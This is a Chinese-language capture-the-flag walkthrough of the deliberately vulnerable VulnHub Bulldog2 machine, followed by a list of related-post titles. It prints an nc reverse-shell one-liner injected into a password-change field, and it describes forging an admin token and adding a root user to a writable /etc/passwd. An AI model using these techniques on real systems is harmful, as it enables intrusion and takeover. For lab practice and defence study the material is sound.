一、靶机下载

靶机下载地址:https://download.vulnhub.com/bulldog/Bulldog2.ova

二、bulldog2靶机搭建

靶机:
将下载好的靶机环境,用VM VirtualBox导入即可使用,管理->导入虚拟电脑


设置网络模式,网卡选择仅主机模式

kali攻击机:
点开vmware中的虚拟选项编辑器中
点击更改设置,让vmware桥接至VirtualBox Host-Only Ethernet Adapter

注意:靶机用VMware搭建,本电脑出现不能获取IP地址的问题,不知道你们电脑可不可以,不可以就用virtualbox虚拟机搭建吧
靶机搭建成功如下图所示,会自动出现IP地址

三、攻击过程

1、主机发现

因靶机是自动获取IP,与kali在同一个网段,故用nmap扫描即可
nmap -sn 192.168.56.0/24

2、端口扫描

根据上面主机发现得到的主机,然后依次对每个主机进行快速端口扫描,分析得到自己要攻击的目标主机
nmap -sS 192.168.56.102

3、端口服务识别

4、漏洞查找与利用

浏览器访问http://192.168.10.155,发现发现登录界面,尝试目录扫描,没发现有用信息



查看主页,发现我们在查看页面的时候可以看到,页面上有个注册功能,但是点击报错。那根据个人经验估计突破口肯定在js文件里

把所有js文件保存在本地,搜索关键字register,查看js文件,根据js的定义,我们可以使用post提交新账户信息来完成注册


根据js上的定义,我们可以使用 post提交 新账户信息来完成注册,但是注意这里有2点要求:
Content-Type 必须要是:application/json
post 数据包内容处,必须要严格按照js代码里的规范
构造数据包内容如下,注册新帐户aqk密码123456

5、登录测试是否存在逻辑漏洞

登录aqk观察网页特点,发现url中路径结尾和用户名一样,测试是否存在越权漏洞,重新注册一个账户aaa

在不登出aqk用户的前题下,把url修改为别的用户名,下图可以看到成功登录别的用户界面,说明存在水平越权漏洞

6、测试是否存在未授权访问漏洞

在另一个浏览器,访问http://192.168.56.102/profile/aaa,没有经过身份验证直接进入sss账户的管理界面

7、奇怪的token
登录aqk用户,发现页面没什么,没有什么可以利用的,重新登录,抓包分析,靶机返回一个奇怪的token

下一步我们就来解密一下看这个tonken传递了什么内容,

可以看到一个可疑的参数:“auth_level”,通过名字就应该知道是判断用户权限的,我们使用这个参数去刚刚保存的几个js文件里搜索看看,如图:

在743行代码处,看到它的判断,下一步我们只需要把“master_admin_user” 替换掉原来的就行,如图:
拦截返回的response数据包,修改token值

下一步就是复制修改后的新编码替换原来的编码,注:后面明文处也要修改成“master_admin_user”,如图:

此时再看kkk账户已经变成管理员,说明存在垂直越权漏洞

点击管理员

输入用户名密码,抓包,然后在修改密码处添加反弹shell,在攻击端开启监听,发送数据包,这时攻击端便获得目标的shell了

反弹shell命令:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.103 1234 >/tmp/f
在攻击端监听

查看所有可写的文件

find / -writable -type f 2>/dev/null |grep -v “/proc/”

passwd文件可以写,直接写入一条用户记录
先生成一个密码

然后写入passwd文件,成功写入

当前不是终端,无法切换账户,需要新打开一个终端,然后切换账户成功,获得管理员权限
python -c ‘import pty;pty.spawn("/bin/bash")’

四、总结

1.信息收集

2.水平越权

3.垂直越权

4.未授权访问

5.任意账户注册

6.命令执行

kali渗透综合靶机(三)--bulldog2靶机相关推荐

  1. kali渗透综合靶机(十)--Raven靶机

    一.靶机下载 下载链接:https://download.vulnhub.com/raven/Raven.ova 二.Raven靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件-> ...

  2. 渗透测试实战3——bulldog2靶机入侵

    一.实验环境 Kali攻击机:192.168.247.149 bulldog 2靶机:192.168.247.150.(192.168.247.151) 开始之前,需先登录bulldog2.账号:di ...

  3. Kali渗透测试——利用metasploit攻击靶机WinXP SP1

    搭建渗透测试环境 Kali攻击机 WinXP SP1 靶机 启动metasploit 跟windows RPC相关的漏洞 内部提供的漏洞攻击 靶机winxp sp1网络配置 查看虚拟机的NAT网段 配 ...

  4. 【VulnHub靶机渗透】一:BullDog2

    在网上各位大佬WriteUp的帮助下,成功完成了第一次完整的靶机渗透测试(大佬NB!),现将详细过程及原理做简单整理. 文章目录 简介 渗透步骤 1.主机发现.端口扫描 2.Web扫描.漏洞发现 3. ...

  5. bulldog2 靶机渗透

    bulldog2 靶机渗透 1.先做主机发现 2.查看目标靶机开通的服务,发现目标靶机只开通了80端口 3.使用http服务登录主页 4.发现网站关闭了注册功能 5.发现用户遍历漏洞 6.查看下载好的 ...

  6. 渗透测试实例,xampp靶机实验

    实验名称:渗透测试实例,xampp靶机实验 实验目的:对xampp靶机进行渗透测试 实验环境:Kali虚拟机一台4G xampp靶机一台 IP:192.168.22.128 实验步骤: 一.对靶机进行 ...

  7. kali渗透测试系列---信息收集

    kali 渗透测试系列 文章目录 kali 渗透测试系列 信息收集 信息收集 信息收集阶段可以说是在整个渗透测试或者攻击很重要的阶段,毕竟知己知彼才能百战百胜,否则从目标主机使用的平台到数据库的使用再 ...

  8. kali渗透测试与教学笔记10

    漏洞利用:参考kali linux 渗透技术详解 实验靶机:metasploitable2 辅助模块:auxiliary/server/browser_autopwn,只攻击IE7 在metasplo ...

  9. Kali渗透测试-远程控制:6200端口变成“后门”

    Kali渗透测试-远程控制:6200端口变成"后门" 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:M ...

最新文章

  1. 剑指offer:面试题11. 旋转数组的最小数字
  2. Fishe向量Fisher Vecotr(二)
  3. Ubuntu安装okular PDF阅读器
  4. tombstone问题分析
  5. Oracle 内核参数
  6. NWERC 2018 A. Access Points 二维转一维 + 单调栈
  7. java datetime 转换_如何实现Java日期时间格式转换
  8. Intel刚刚收购的Vertex.AI,到底有什么黑科技?
  9. 【Dairy】2016.10.30 BirthdayParty
  10. MOSS提升权限方法
  11. Python查看文章中每个单词的出现频率
  12. 工厂模式的思想主要为
  13. python逻辑运算符例子_python运算符-实战中常用的三个逻辑运算符使用实例
  14. 直播源列表转换php,电视直播源列表制作、转换工具Telelist(可以DPL、M3U、TXT等互转)...
  15. 内部收益率计算公式用计算机,内部收益率计算器
  16. 微信支付服务器白名单,总结下我在微信支付中趟的那些坑。
  17. 华为防火墙配置(双机热备)
  18. 【报告分享】2020中国民营企业500强调研分析报告-全国工商联(附下载)
  19. angularjs 猜大小
  20. 【阿里云】域名解析 Tomcat绑定域名

热门文章

  1. java http ipv6_Java支持IPv6研究
  2. 看过1000份算法简历,才明白人工智能、机器学习、深度学习!!!
  3. 从前有座山,山上有两台计算机
  4. 通信原理及系统系列33——无线信道(快衰落)
  5. Rust 闭包学习 (Fn/FnMut/FnOnce)
  6. iOS Code Signing 学习笔记转写
  7. AppNode受控端命令 - AppNode帮助中心
  8. html js 禁用浏览器上下滑动,纯JS阻止浏览器默认滚动事件,实现自定义滚动方法...
  9. ZYNQ空间地址详细配置
  10. 从华为辞职门 看IT人如何度过下半生(转载)